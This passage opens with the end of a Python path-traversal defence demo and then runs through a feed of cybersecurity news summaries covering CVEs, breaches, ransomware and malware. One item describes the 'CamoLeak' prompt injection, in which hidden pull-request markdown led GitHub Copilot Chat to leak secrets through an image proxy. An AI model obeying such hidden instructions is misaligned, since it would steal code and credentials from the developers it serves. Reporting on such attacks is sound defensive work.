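        safe_delete(str(uploads), "design.png")   # legitimate use still works
        results["legit_delete_ok"] = not (uploads / "design.png").exists()
        return results


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k:<24} {v}")
```

The check is done on the resolved path, not on the string: stripping "../" from input is the classic mistake, since "....//" and encoded variants survive it, whereas comparing the canonical target against the canonical base catches every spelling of the same escape.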

Oct 12, 2025 · 4 min read

WordPress Plugin 'Contest Gallery' Vulnerable to CSV Injection Attacks

A medium-severity CSV injection vulnerability, CVE-2025-11254, has been disclosed in the 'Contest Gallery' plugin for WordPress. The flaw affects all versions up to and including 27.0.3. It allows an unauthenticated attacker to embed malicious formulas into data fields that are later exported as a CSV file by a site administrator. If the administrator opens the malicious CSV file in a spreadsheet program like Microsoft Excel, the formulas can execute, potentially leading to arbitrary code execution on their local machine. The vulnerability has a CVSS score of 4.3 and has been patched in version 28.0.0 of the plugin.

Oct 12, 2025 · 4 min read

Discord Breach Exposes 5.5M Users via Third-Party Vendor Compromise

Discord has officially confirmed a data breach that originated from a compromised third-party customer support vendor, Zendesk. The incident exposed the data of users who had interacted with Discord's support channels. Hackers claim to have exfiltrated information from 5.5 million users, including usernames, email addresses, IP addresses, and the contents of support tickets. Discord has assured its community that sensitive data such as passwords and authentication tokens were not compromised. In response, Discord has revoked the vendor's system access and is in the process of notifying all affected individuals, highlighting the persistent risks associated with third-party supply chain security.

Oct 11, 2025 · 5 min read

175 Malicious NPM Packages Target Developers in Widespread Phishing Attack

A significant software supply chain attack has been identified on the npm open-source repository, where researchers discovered 175 malicious packages that were downloaded approximately 26,000 times. These packages were trojanized to execute credential phishing attacks against developers, aiming to steal logins and API keys. The campaign, which primarily targeted the technology and energy sectors, often used typosquatting techniques to mimic legitimate packages. This incident highlights the critical need for organizations to implement stringent dependency vetting and runtime security monitoring to defend against attacks targeting the software development lifecycle.

Oct 11, 2025 · 5 min read

New 'Chaosbot' Malware Weaponizes Cisco VPN & AD Credentials for Lateral Movement

A new malware strain named "Chaosbot" has been discovered by security researchers. It specializes in using stolen Cisco VPN and Active Directory credentials to execute commands and move laterally within compromised corporate networks. By leveraging legitimate enterprise tools and protocols, this 'living off the land' technique makes the malware's activity difficult to distinguish from normal administrative behavior. Chaosbot represents a significant threat for establishing persistence, escalating privileges, and deploying secondary payloads like ransomware.

Oct 11, 2025 · 5 min read

New 'Stealit' Malware Targets Developers via Malicious Node.js Extensions

A new information-stealing malware named "Stealit" is targeting Windows systems by using malicious Node.js extensions as its infection vector. This novel approach specifically targets software developers, aiming to steal sensitive data such as source code, API keys, and other credentials directly from their development environments. The emergence of Stealit highlights an increasing focus by threat actors on compromising the software supply chain at its source, turning trusted development tools into attack vectors.

Oct 11, 2025 · 5 min read

'MalTerminal' Malware Uses OpenAI's GPT-4 to Auto-Generate Ransomware Code

Researchers have discovered "MalTerminal," a novel malware that uses OpenAI's GPT-4 large language model (LLM) to dynamically generate ransomware code. This represents a significant and dangerous evolution in malware development, enabling the creation of polymorphic code that can evade traditional signature-based detection. The technique dramatically lowers the barrier for less-skilled actors to create sophisticated attacks and poses a major new challenge for cybersecurity defenses, requiring a shift towards behavioral analysis and anomaly detection.

Oct 11, 2025 · 6 min read

Juniper Networks Patches 220 Flaws, Including Nine Critical Bugs Dating Back Years

Juniper Networks has released a massive security update for October 2025, addressing a total of 220 vulnerabilities across its broad portfolio of networking products. The patch bundle includes fixes for nine flaws rated as critical, posing a severe risk of remote code execution or system takeover. Alarmingly, analysis suggests some of these vulnerabilities have existed in products since at least 2019, creating a long window of exposure for potential exploitation. Customers are urged to review the advisories and apply the necessary updates with extreme urgency.

Oct 11, 2025 · 5 min read

Cl0p Ransomware Exploits Oracle E-Business Suite Zero-Day in Mass Attack

The notorious Cl0p ransomware gang is conducting a widespread extortion campaign by exploiting a critical, unauthenticated remote code execution (RCE) zero-day vulnerability (CVE-2025-61882) in Oracle E-Business Suite. The campaign, active since at least August, involves Cl0p breaching vulnerable systems to steal data and then sending extortion emails to thousands of accounts. Oracle has released an emergency patch for the flaw, which affects versions 12.2.3 through 12.2.14, and is urging customers to update immediately. This attack follows Cl0p's established pattern of leveraging high-impact zero-days in enterprise software for mass compromise.

Oct 10, 2025 · 5 min read

GitHub Patches 'CamoLeak' Flaw in Copilot That Allowed Silent Code and Secret Exfiltration

A critical vulnerability, dubbed 'CamoLeak,' has been discovered and patched in **[GitHub Copilot Chat](https://github.com/features/copilot)**. The flaw, rated 9.6 CVSS by researcher Omer Mayraz of Legit Security, allowed attackers to silently steal private source code, API keys, and other secrets from developers' repositories. The attack involved a novel prompt injection technique where malicious instructions were hidden in a pull request's markdown. When a developer used Copilot to review the PR, the AI would execute the hidden commands. The stolen data was then exfiltrated character-by-character using a clever trick involving **[GitHub](https://github.com/)**'s own image proxy service, Camo, bypassing standard security controls. GitHub has mitigated the flaw by disabling image rendering in Copilot Chat.

Oct 10, 2025 · 5 min read

Crypto Platform Shuffle.com Discloses Major Data Breach via Third-Party CRM Provider

Crypto betting platform **[Shuffle.com](https://shuffle.com/)** has confirmed a significant data breach affecting a majority of its users. The incident occurred not on Shuffle's own systems, but at its third-party CRM provider, **Fast Track**. On October 10, Shuffle announced that attackers compromised Fast Track and gained access to a trove of sensitive user data. The exposed information includes full names, emails, phone numbers, home addresses, transaction histories, and, most critically, Know Your Customer (KYC) identity documents like passports and driver's licenses. While user funds and passwords are safe, the breach creates a severe risk of identity theft and targeted phishing for affected customers. Shuffle has revoked the provider's access and is urging users to enable 2FA.

Oct 10, 2025 · 5 min read

New 'White Lock' Ransomware Emerges, Demanding 4 Bitcoin and Threatening Data Leaks

A new ransomware strain named **White Lock** has been identified by cybersecurity researchers. Operating as a double-extortion threat, the malware first exfiltrates sensitive data before encrypting files on the victim's Windows system, appending the `.fbin` extension. A ransom note, `c0ntact.txt`, is dropped in each affected folder, demanding a payment of 4 Bitcoin within a stringent four-day deadline. The operators threaten to notify the victim's customers, sell the stolen data to competitors, and ultimately leak it publicly if the ransom is not paid. Victims are instructed to use the **[Tor](https://www.torproject.org/)** browser to communicate with the attackers, suggesting a focus on high-value enterprise targets.

Oct 10, 2025 · 5 min read

Humiliation for Pro-Russian Hackers 'TwoNet' After Attacking Decoy Water Utility Honeypot

The pro-Russian hacktivist group **TwoNet** has been publicly embarrassed after cybersecurity firm **[Forescout](https://www.forescout.com/)** revealed the group was duped into attacking a sophisticated decoy system. In September, TwoNet boasted on Telegram about disrupting a Dutch water utility's control systems. However, Forescout's research, published on October 10, confirmed the 'attack' was against one of their industrial control system (ICS) honeypots. The attacker, 'Barlati,' gained access using default credentials (`admin`/`admin`), defaced the HMI, and changed settings, believing it was a real facility. The incident highlights the naivety of some hacktivist groups and provides valuable intelligence on their TTPs against critical infrastructure.

Oct 10, 2025 · 5 min read

New Chinese APT 'Phantom Taurus' Targets Global Geopolitical Intel with 'NET-STAR' Malware

A newly designated, sophisticated threat group aligned with China, named **Phantom Taurus**, has been identified conducting long-term cyber-espionage campaigns. Active for over two years, the group targets government, military, and telecommunications organizations across Africa, the Middle East, and Asia. Its operations focus on strategic intelligence gathering that aligns with China's geopolitical interests. **Phantom Taurus** is distinguished by its stealth and use of a custom malware suite called **NET-STAR**, which targets **[Microsoft Internet Information Services (IIS)](https://www.iis.net/)** servers. While showing some infrastructure overlap with known APTs like **[APT27](https://attack.mitre.org/groups/G0045/)** and **[Mustang Panda](https://attack.mitre.org/groups/G0129/)**, its unique tools and TTPs mark it as a distinct and advanced threat.

Oct 10, 2025 · 6 min read

Killsec Ransomware Claims Attack on Indonesian FinTech WalletKu, Threatens to Leak KYC Data

The **Killsec** ransomware group has claimed responsibility for an attack on **WalletKu Indompet Indonesia**, a financial technology firm based in Jakarta. WalletKu provides a digital payment application primarily for micro, small, and medium enterprises. According to a post on an underground forum, Killsec has compromised the company and is threatening to release a significant amount of sensitive customer data. The exposed data reportedly includes Know Your Customer (KYC) information, such as full names, photos, government-issued IDs, and addresses. The attack highlights the growing trend of ransomware groups targeting FinTech companies, where the theft of KYC data poses a severe risk of identity theft and fraud for customers.

Oct 10, 2025 · 5 min read

'Datzbro' Android Trojan Targets Seniors in Global AI-Powered Facebook Scam

A global malicious campaign is using AI-generated content to create fake **[Facebook](https://www.facebook.com/)** groups that target seniors. The campaign, detailed in a CYFIRMA report, sets up convincing-looking communities for social events to lure victims into downloading a malicious Android application. This app is a potent banking trojan and spyware known as **Datzbro**. The malware can grant attackers full remote control of the device, enabling them to record audio and video, steal files, and use phishing overlays to capture banking credentials. The campaign has been observed targeting users in Australia, Canada, the UK, and Southeast Asia. The threat is amplified by the fact that the builder for the Datzbro trojan was previously leaked online, allowing any criminal to use it.

Oct 10, 2025 · 5 min read

Perfect 10.0 CVSS Flaw in GoAnywhere MFT Exploited by Medusa Ransomware Group

Microsoft has linked the cybercrime group Storm-1175, known for deploying Medusa ransomware, to the active exploitation of a critical vulnerability in Fortra's GoAnywhere Managed File Transfer (MFT) solution. The flaw, CVE-2025-10035, is an unauthenticated remote code execution vulnerability with a perfect 10.0 CVSS score. Storm-1175 has been exploiting this zero-day since at least September 11, 2025, to compromise organizations in finance, healthcare, and technology, deploying backdoors and RMM tools before exfiltrating data and deploying ransomware.

Oct 9, 2025 · 5 min read

Phishing Campaign Lures Marketing Professionals with Fake Jobs at Tesla, Google

Security firm Cofense has detailed a sophisticated phishing campaign that targets marketing and social media professionals with fake job opportunities from high-profile brands like Tesla, Google, Ferrari, and Red Bull. The campaign uses realistic emails and multi-step credential harvesting portals to trick victims. Unlike typical phishing attacks, the primary goal is to collect detailed resumes and other personally identifiable information (PII). This data can then be used by threat actors to craft more convincing social engineering attacks, bypass security questions, or commit identity theft.

Oct 9, 2025 · 4 min read

Financial Firms Tie CEO Pay to Cyber Performance Amid Budget Hikes, Moody's Finds

A new report from Moody's indicates a significant shift in how financial and insurance firms are managing cyber risk. Companies are increasing cybersecurity spending, with nearly half dedicating 8% or more of their IT budget to cyber. Governance is also strengthening, as 40% of firms now link CEO compensation directly to cybersecurity performance, up from 24% in 2023. Furthermore, CISO briefings to the board are becoming more frequent, and firms are maturing their operational readiness with annual incident response tests and daily data backups.

Oct 9, 2025 · 3 min read

Expert Advice on Securing Critical Infrastructure with Limited Budgets

In a recent podcast, cybersecurity expert Chetrice Romero from Ice Miller provided guidance for leaders responsible for protecting critical infrastructure, particularly those facing limited budgets. The discussion covered common cyber and physical threats to utilities, the need for scalable and resilient strategies, and practical advice for maximizing security investments. Key recommendations included embracing cloud-native platforms for efficiency and designing future-proof command centers, offering actionable insights for securing essential systems in a challenging economic environment.

Oct 9, 2025 · 3 min read

Clop Exploits Critical Oracle Zero-Day; CISA Issues Emergency Patch Directive

Multiple international cybersecurity agencies, including CISA, the UK's NCSC, and Singapore's CSA, have issued urgent warnings about a critical zero-day vulnerability, CVE-2025-61882, in Oracle E-Business Suite. The flaw, which has a CVSS score of 9.8, is being actively exploited by the Clop ransomware group in a campaign that began in August 2025. The attackers are leveraging the vulnerability to exfiltrate corporate data and are now sending extortion emails to executives of victim organizations. CISA has added the vulnerability to its Known Exploited Vulnerabilities (KEV) catalog, mandating federal agencies to patch by October 28, 2025, highlighting the extreme risk posed by this unauthenticated remote code execution flaw.

Oct 8, 2025 · 5 min read

Qilin Ransomware Claims Disruptive Attack on Japanese Beverage Giant Asahi

The Russia-based Qilin ransomware group has claimed responsibility for a significant cyberattack against Asahi Group Holdings, one of Japan's largest beverage companies. The attack, first disclosed in late September 2025, caused major operational disruptions, forcing the suspension of order and shipment systems. On October 7, Qilin added Asahi to its data leak site, alleging the theft of 27 gigabytes of sensitive data, including contracts and employee information. Asahi is still working to restore its systems, highlighting the vulnerability of manufacturing and supply chain operations to ransomware.

Oct 8, 2025 · 4 min read

Microsoft Warns of Attackers Abusing Teams for Session Hijacking

Microsoft has issued a warning about a threat actor group, tracked as Storm-2372, that is abusing legitimate Microsoft Teams features for cyberattacks. In a report on October 7, 2025, Microsoft detailed how the group uses social engineering within Teams chats and file sharing to deliver malware, trick users into fraudulent authentication flows, and ultimately steal access tokens to hijack user sessions. The attacks are effective because they originate from within the trusted Teams environment, making users more likely to fall for the lures.

Oct 8, 2025 · 4 min read

Red Hat Consulting GitLab Breached; ShinyHunters Leaks Sensitive Client Data

Red Hat has confirmed a security breach affecting an internal GitLab server used by its consulting division. A group named 'Crimson Collective,' in collaboration with the notorious extortion group 'ShinyHunters,' claims to have stolen 570GB of data from over 28,000 repositories. The stolen data allegedly includes highly sensitive 'Customer Engagement Reports' containing network diagrams, configurations, and access details for over 800 organizations, including Bank of America, Verizon, and the U.S. National Security Agency. While Red Hat states the breach was contained and did not impact its product supply chain, the incident represents a massive supply chain risk for its clients.

Oct 8, 2025 · 5 min read

Methodist Homes Discloses Healthcare Data Breach Affecting Nearly 26,000

Methodist Homes of Alabama & Northwest Florida, a senior living and healthcare provider, announced on October 8, 2025, that it suffered a data breach affecting 25,579 individuals. The incident, which occurred over a 12-day period in October 2024, resulted in unauthorized access to sensitive personal and protected health information (PHI). The compromised data includes names, Social Security numbers, driver's license numbers, and detailed clinical information. The organization's disclosure comes nearly a year after the initial detection of the breach.

Oct 8, 2025 · 4 min read

Critical RCE Flaw (CVE-2025-53967) Patched in Figma AI Tool

A high-severity command injection vulnerability, CVE-2025-53967, has been discovered and patched in the 'figma-developer-mcp' Model Context Protocol server, a tool used with the Figma design platform. The flaw, rated with a CVSS score of 7.5, could allow an unauthenticated attacker to achieve remote code execution (RCE) on a server running the tool. The vulnerability, discovered by Imperva, stemmed from the unsanitized use of user input in command-line strings. Users are urged to update to the patched version to mitigate the risk of server compromise.

Oct 8, 2025 · 4 min read

Google Rolls Out October 2025 Security Update for Pixel Devices

Google has released its scheduled October 2025 security update for all supported Pixel devices. The update, detailed in the Pixel Update Bulletin on October 8, 2025, addresses numerous security vulnerabilities. It incorporates all patches from the broader October 2025 Android Security Bulletin, along with additional fixes for flaws specific to Pixel hardware components. Google urges all Pixel users to accept the over-the-air (OTA) update to protect their devices from potential exploitation.

Oct 8, 2025 · 3 min read

Atos Partners with Qevlar AI to Deploy "Virtual SOC Analyst"

On October 7, 2025, the global digital transformation and cybersecurity firm Atos announced a strategic partnership with Qevlar AI. The collaboration will integrate Qevlar's 'Virtual SOC Analyst,' an agentic AI technology, into Atos's global network of 17 Security Operations Centers (SOCs). The goal is to automate routine and intermediate security alert investigations, allowing Atos's human analysts to focus on more complex tasks like proactive threat hunting. The partnership aims to enhance operational efficiency for Atos's 2,000+ managed security customers.

Oct 8, 2025 · 3 min read

SonicWall Breach Escalates: 100% of Cloud Backups Confirmed Stolen

Firewall vendor SonicWall has dramatically escalated the severity of a recent data breach, confirming that an investigation found that 100% of customers using its cloud backup service had their firewall configuration files stolen. This admission, made on October 6, 2025, after an investigation with Mandiant, starkly contrasts with the company's initial September statement that only 5% of its user base was affected. The stolen files, accessed via the MySonicWall portal, contain sensitive network architecture details and encrypted credentials, posing a significant reconnaissance risk for future attacks against all affected customers.

Oct 8, 2025 · 5 min read

New 'Scattered Lapsus$ Hunters' Gang Extorts 39 Salesforce Customers on Leak Site

A new cybercriminal collective calling itself 'Scattered Lapsus$ Hunters' has emerged, claiming to be a merger of members from Scattered Spider, Lapsus$, and ShinyHunters. The group launched a dark web data leak site over the weekend of October 4-5, listing 39 major companies, including Cisco, Toyota, and Marriott, as victims of a massive data breach affecting their Salesforce instances. The actors claim to have exfiltrated nearly one billion records and have set an October 10 deadline for ransoms to be paid. In an unusual tactic, they have also demanded that Salesforce pay a ransom to spare the listed victims, threatening to release documents proving alleged security negligence. The breaches are suspected to have originated from vishing attacks targeting IT help desks.

Oct 8, 2025 · 5 min read

CISA Adds Actively Exploited Zimbra XSS Zero-Day (CVE-2025-27915) to KEV Catalog

On October 7, 2025, CISA added CVE-2025-27915, a high-severity zero-day vulnerability in the Zimbra Collaboration Suite (ZCS), to its Known Exploited Vulnerabilities (KEV) catalog. The flaw is a stored cross-site scripting (XSS) issue in the ZCS Classic Web Client that can be triggered with no user interaction beyond viewing a malicious email. An attacker can craft a malicious iCalendar invitation that, when processed, executes arbitrary JavaScript in the victim's authenticated session. This allows for account takeover, data exfiltration, and redirection of sensitive emails. Federal agencies are mandated to apply mitigations by October 28, 2025.

Oct 8, 2025 · 4 min read

Signal Threatens to Exit EU Market if "Chat Control" Mass Surveillance Bill Passes

Meredith Whittaker, the president of the Signal Foundation, has declared that the encrypted messaging service will withdraw from the European Union if the controversial 'Chat Control' legislation is enacted. The proposed law, which faces a critical vote on October 14, would mandate that communication platforms like Signal and WhatsApp scan all user content, including private messages and photos, for illicit material before it is encrypted. Critics, including Signal, argue this would create a backdoor for mass surveillance, fundamentally break end-to-end encryption, and create a dangerous cybersecurity precedent. The statement is a direct appeal to EU member states, particularly Germany, to vote against the measure.

Oct 7, 2025 · 4 min read

CISA Warns of Actively Exploited Windows Privilege Escalation Flaw (CVE-2021-43226)

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added CVE-2021-43226, a high-severity privilege escalation vulnerability in the Microsoft Windows Common Log File System (CLFS) Driver, to its Known Exploited Vulnerabilities (KEV) catalog. The action, taken on October 6, 2025, confirms the flaw is being actively exploited in the wild. The vulnerability allows a local, authenticated attacker to execute code with SYSTEM-level privileges by leveraging a buffer overflow. The flaw affects a wide range of Windows versions, including Windows 10, 11, and Server editions. Federal agencies have been directed to patch the vulnerability by October 27, 2025.

Oct 7, 2025 · 4 min read

Jaguar Land Rover Begins Phased Restart a Month After Crippling Cyberattack

On October 7, 2025, Jaguar Land Rover (JLR) announced it is beginning a phased restart of its manufacturing plants, more than a month after a major cyberattack on August 31 halted its global operations. The attack disrupted everything from production lines and parts flow to retail systems. The restart is beginning cautiously, with engine plants and stamping operations coming online first, and full production is hoped for by the end of October. The incident has caused a significant financial blow, with sales dropping sharply in all markets. In response to the crisis, JLR has also launched a new financing program to support its struggling suppliers who have lost weeks of orders.

Oct 7, 2025 · 5 min read

AI Risk Disclosures Skyrocket Among S&P 500, Cybersecurity a Top Concern

A new report from The Conference Board, released on October 7, 2025, reveals a dramatic shift in corporate risk perception, with over 70% of S&P 500 companies now formally disclosing AI-related risks in their public filings. This is a massive jump from just 12% in 2023. Reputational damage is the most cited concern (38%), followed closely by cybersecurity risks (20%). Companies are increasingly worried about how AI expands the attack surface, introduces new vulnerabilities through third-party tools, and creates new legal and regulatory challenges. The findings highlight that while AI adoption is accelerating, corporate governance and oversight are still struggling to keep pace.

Oct 7, 2025 · 4 min read

Redis Patches Critical "RediShell" RCE Flaw (CVE-2025-49844) in Lua Sandbox

Redis has released patches for CVE-2025-49844, a critical use-after-free vulnerability nicknamed "RediShell" by the Wiz researchers who discovered it. The flaw, announced on October 7, 2025, allows an authenticated attacker to escape the Lua sandbox and achieve remote code execution (RCE) on the underlying server. The risk is especially high for the estimated 330,000 internet-exposed Redis instances, around 60,000 of which are believed to have no authentication enabled. Because official Redis container images disable authentication by default, these instances are vulnerable to unauthenticated RCE. Security agencies like Germany's BSI are warning of imminent exploitation.

Oct 7, 2025 · 5 min read

Digicloud Africa to Distribute Google's AI-Powered SecOps Platform Across Continent

Digicloud Africa, a major Google Cloud distributor, announced on October 6, 2025, that it has partnered with Google Security Operations. This collaboration will make Google's advanced, AI-driven cybersecurity solutions, including its cloud-native SIEM and SOAR platform, available to enterprises and organizations across the African continent. The partnership aims to help African businesses modernize their security posture, moving from reactive to proactive, intelligence-driven defense strategies to combat the growing complexity of cyber threats in the region.

Oct 7, 2025 · 3 min read

CISA Warns of Widespread Flaws in Industrial Control Systems from Major Vendors

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has released a series of advisories warning of numerous vulnerabilities in Industrial Control Systems (ICS) from prominent vendors, including Rockwell Automation, Hitachi Energy, Mitsubishi Electric, and Delta Electronics. These flaws affect products widely deployed in the energy sector and other critical infrastructure domains. CISA is urging administrators to review the advisories and apply patches and mitigations immediately to prevent potential exploitation that could lead to operational disruptions or cyberattacks against critical national infrastructure.

Oct 6, 2025 · 4 min read

Microsoft Patches 3 Zero-Days Under Active Attack in Massive October Update

Microsoft has released its October 2025 Patch Tuesday update, a colossal release addressing 175 security flaws across its product suite. The update is highlighted by emergency patches for three zero-day vulnerabilities confirmed to be actively exploited in the wild. These critical flaws, now added to CISA's KEV catalog, include two privilege escalation bugs in Windows components (CVE-2025-59230 and CVE-2025-24990) and a Secure Boot bypass (CVE-2025-47827). The update also fixes a critical 9.8 CVSS RCE vulnerability in WSUS (CVE-2025-59287), posing a significant supply-chain risk. Administrators are urged to apply these updates immediately to mitigate active threats.

Oct 6, 2025 · 5 min read

Chinese APT Flax Typhoon Weaponizes ArcGIS Server as Persistent Backdoor in Year-Long Spy Campaign

The China-linked threat group Flax Typhoon (also known as Ethereal Panda) conducted a sophisticated, year-long espionage campaign against a government agency by compromising an Esri ArcGIS server. According to researchers at ReliaQuest, the attackers modified a legitimate Java server object extension (SOE) to create a persistent web shell. This backdoor, combined with extensive use of living-off-the-land techniques like PowerShell and a renamed SoftEther VPN client, allowed the APT group to maintain long-term access, move laterally, and harvest credentials while evading detection by hiding within legitimate server traffic.

Oct 6, 2025 · 5 min read

Qilin Ransomware Cripples Asahi Breweries, Demands $10 Million Ransom

The Qilin ransomware group has claimed responsibility for a devastating cyberattack against Asahi Group Holdings, one of Japan's largest beverage companies. The attack, which occurred in late September, forced the company to halt production at 30 factories and suspend shipments, leading to significant operational and financial disruption. The threat actors are now reportedly demanding a $10 million ransom to prevent the public release of exfiltrated company data, employing a classic double extortion tactic. The incident highlights the increasing trend of ransomware gangs targeting the manufacturing sector to maximize impact and pressure victims into paying large ransoms.

Oct 6, 2025 · 5 min read

Phishing Campaign Abuses NPM and UNPKG CDN to Steal Credentials

A sophisticated phishing campaign, dubbed "Beamglea," is abusing the public NPM registry and the trusted unpkg.com CDN to host and deliver credential-stealing malware. Researchers at Socket discovered over 175 malicious, disposable NPM packages created solely to serve a malicious JavaScript file. Attackers send HTML lures to victims that load the script from the reputable unpkg.com domain, bypassing traditional domain-based security filters. This technique, which has targeted over 135 organizations in Europe, represents a dangerous evolution in supply chain abuse, turning developer infrastructure into a tool for direct phishing attacks.

Oct 6, 2025 · 4 min read

G7 Cyber Experts Issue Statement on Managing AI Risks in Financial Sector

The G7 Cyber Expert Group (CEG) has issued a formal statement on the cybersecurity implications of Artificial Intelligence (AI) within the financial sector. Released on October 6, 2025, the document highlights the dual nature of AI, acknowledging its potential to bolster cyber defenses while also warning that it can amplify existing threats and introduce new vulnerabilities. The G7 CEG urges financial institutions and regulators to proactively develop robust governance and risk management frameworks to ensure the secure and resilient adoption of AI, promoting collaboration to establish global best practices.

Oct 6, 2025 · 4 min read

"Maverick": New Banking Trojan Spreads via WhatsApp in Brazil

A new and sophisticated fileless banking Trojan named "Maverick" is spreading rapidly in Brazil through a large-scale WhatsApp campaign. According to Kaspersky researchers, the malware is delivered via ZIP archives containing malicious LNK files, a method that bypasses the platform's file-blocking. Maverick operates entirely in memory to evade detection, using PowerShell and encrypted shellcode to steal credentials for 26 Brazilian banks and multiple cryptocurrency exchanges. The Trojan also features a worm-like self-propagation mechanism, hijacking the victim's WhatsApp Web session to automatically send the malicious payload to all their contacts.

Oct 6, 2025 · 5 min read

Intelligence Publications

Microsoft Patches Actively Exploited Zero-Day as Phishing and Malware Tactics Evolve

This cybersecurity brief for December 18, 2025, covers several critical developments. The most urgent is Microsoft's final Patch Tuesday of the year, which addresses an actively exploited zero-day (CVE-2025-62221) in Windows, prompting a CISA directive. Concurrently, threat actors are escalating phishing campaigns against Microsoft 365 using OAuth device code abuse. Other significant events include the discovery of the 'GhostPoster' malware in Firefox add-ons, the emergence of AI-powered ransomware like 'PromptLock', and an investigation by Google into malicious code found within its search infrastructure.

Dec 17, 2025 · 7 articles

Critical React2Shell Flaw Under Widespread Attack, CISA Warns of Fortinet Exploit, and AI Fuels Cloud Risk

This cybersecurity brief for December 17, 2025, covers a surge in critical vulnerability exploitation. A CVSS 10.0 flaw in React, dubbed 'React2Shell,' is being widely abused by both state actors and cybercriminals to deploy backdoors and miners. CISA has added a critical, actively exploited Fortinet SSO vulnerability to its KEV catalog. Meanwhile, a new Palo Alto Networks report reveals that rapid AI adoption is massively expanding the cloud attack surface, with 99% of organizations reporting attacks on their AI systems. Other major events include a cyberattack on the French Interior Ministry, a novel 'ConsentFix' phishing technique bypassing MFA to hijack Microsoft accounts, and a large-scale malware alert in New Zealand for Lumma Stealer infections.

Dec 16, 2025 · 7 articles

Massive Financial Breaches Expose 18M+; Apple & Google Patch Actively Exploited Zero-Days

This cybersecurity brief for December 16, 2025, covers a series of critical incidents. Major data breaches at financial firms 700Credit and Prosper Marketplace have exposed the sensitive information of over 18 million individuals. Concurrently, Apple and Google rushed to patch two actively exploited zero-day vulnerabilities in the WebKit engine. Other significant events include CISA's mandate to patch a critical GeoServer flaw, active attacks on Fortinet SSO vulnerabilities, and data exposures at SoundCloud and Pornhub. Ransomware continues to plague the healthcare sector with an attack on Fieldtex by the Akira group, while new malware campaigns target developers on GitHub.

Dec 15, 2025 · 5 articles

Massive Data Breaches Expose Billions, as Critical Zero-Days in Apple and Google Products See Active Exploitation

This cybersecurity brief for December 15, 2025, covers a series of high-impact incidents. A colossal 16TB unsecured MongoDB database exposed 4.3 billion professional records, creating a massive risk for social engineering. Concurrently, a data breach at fintech firm 700Credit impacted 5.6 million individuals, exposing sensitive PII including Social Security numbers. Tech giants Apple and Google are racing to patch actively exploited zero-day vulnerabilities, with CISA adding one to its KEV catalog. Other critical threats include a newly discovered ransomware group named 'Gentlemen', an actively exploited flaw in Sierra Wireless routers affecting critical infrastructure, and a CVSS 10.0 vulnerability in an Apache Tika dependency impacting numerous Atlassian products.

Dec 14, 2025 · 7 articles

Apple Patches Actively Exploited Zero-Days; CISA Warns of Critical Router Flaw Amidst Ransomware Surge

In the period covering December 13-14, 2025, the cybersecurity landscape was dominated by critical vulnerability disclosures and active exploitation campaigns. Apple released an emergency patch for two zero-day flaws in iOS being used in targeted spyware attacks. CISA added a high-severity RCE vulnerability in Sierra Wireless routers to its KEV catalog. Meanwhile, ransomware groups KillSec and Qilin continued their global extortion campaigns, and several major data breaches came to light, including a massive 16TB database exposing 4.3 billion records and a breach at Canadian airline WestJet affecting 1.2 million passengers.

Dec 13, 2025 · 8 articles

React2Shell Ignites Global Exploitation Frenzy; Microsoft Patches Actively Exploited Zero-Day

This cybersecurity brief for December 13, 2025, covers a critical period marked by widespread, active exploitation of the 'React2Shell' vulnerability (CVE-2025-55182) by both criminal and state-sponsored actors, prompting urgent CISA directives. Concurrently, Microsoft's December Patch Tuesday addressed 57 flaws, including an actively exploited Windows zero-day (CVE-2025-62221). Other major incidents include a new Chrome zero-day on macOS, an unpatched zero-day in the Gogs Git service, a major npm supply chain attack by the 'Shai-Hulud 2.0' worm, and new campaigns from the Makop ransomware group and the Hamas-linked WIRTE APT.

Dec 12, 2025 · 5 articles

Microsoft and Google Patch Actively Exploited Zero-Days Amidst Major Healthcare Breaches and Sophisticated Supply Chain Attacks

In the 24-hour period ending December 12, 2025, the cybersecurity landscape was dominated by the urgent patching of actively exploited zero-day vulnerabilities by both Microsoft and Google. Microsoft's December Patch Tuesday addressed a critical privilege escalation flaw (CVE-2025-62221) already in use by attackers, while Google rushed out an emergency fix for its eighth Chrome zero-day this year. The healthcare sector remains under siege, with massive data breaches at Conduent and TriZetto Provider Solutions coming to light, affecting millions. Concurrently, new intelligence revealed sophisticated threats, including the "Shai-Hulud 2.0" supply chain worm, an espionage campaign by the Hamas-affiliated "Ashen Lepus" group, and a novel hardware attack named "Battering RAM" capable of breaking CPU security protections.

Dec 11, 2025 · 4 articles

Microsoft Patches Actively Exploited Zero-Day as Gogs Git Service Reels from Unpatched Flaw

In cybersecurity news for December 11, 2025, Microsoft issued its final Patch Tuesday of the year, addressing an actively exploited privilege escalation zero-day (CVE-2025-62221) in Windows. Concurrently, an unpatched zero-day (CVE-2025-8110) in the Gogs Git service is under active attack, compromising hundreds of instances. New malware threats emerged with 'DroidLock' targeting Android devices and the 'AshTag' suite used by the Ashen Lepus APT against Middle Eastern governments. Other significant developments include new vulnerabilities in React, sophisticated social engineering tactics detailed by HP, and an espionage campaign, 'Operation DupeHike,' targeting Russian corporations.

Dec 10, 2025 · 8 articles

React2Shell Mass Exploitation, Microsoft Zero-Day Patch, and NPM Supply Chain Chaos Dominate Threat Landscape

This cybersecurity brief for December 10, 2025, covers a period of intense activity, headlined by the widespread, multi-actor exploitation of the critical 'React2Shell' RCE vulnerability (CVE-2025-55182). Other major events include Microsoft's December Patch Tuesday addressing an actively exploited Windows zero-day, a massive NPM supply chain attack dubbed 'Shai-Hulud 2.0' that exfiltrated over 400,000 secrets, and a reported 700% surge in ransomware attacks targeting hypervisor infrastructure. The landscape is further marked by warnings of pro-Russian hacktivists targeting industrial systems and several large-scale data breaches.

Dec 9, 2025 · 3 articles

Global Patching Scramble as Critical "React2Shell" RCE Vulnerability Sees Widespread Exploitation

This cybersecurity brief for December 9, 2025, covers a critical unauthenticated RCE vulnerability, dubbed "React2Shell" (CVE-2025-55182), affecting React Server Components and now under active exploitation by multiple threat actors, including state-sponsored groups. Other major developments include the DeadLock ransomware using a novel "Bring Your Own Vulnerable Driver" technique to disable EDRs, the evolution of IAB Storm-0249's tactics, and a new "code-to-cloud" attack vector abusing leaked GitHub Personal Access Tokens. The brief details these threats, provides technical analysis, and offers actionable mitigation strategies for defenders.

Dec 8, 2025 · 8 articles

React2Shell Mass Exploitation: Critical RCE Flaw Hits Web, as Android Zero-Days and FinCEN Report Highlight Escalating Threats

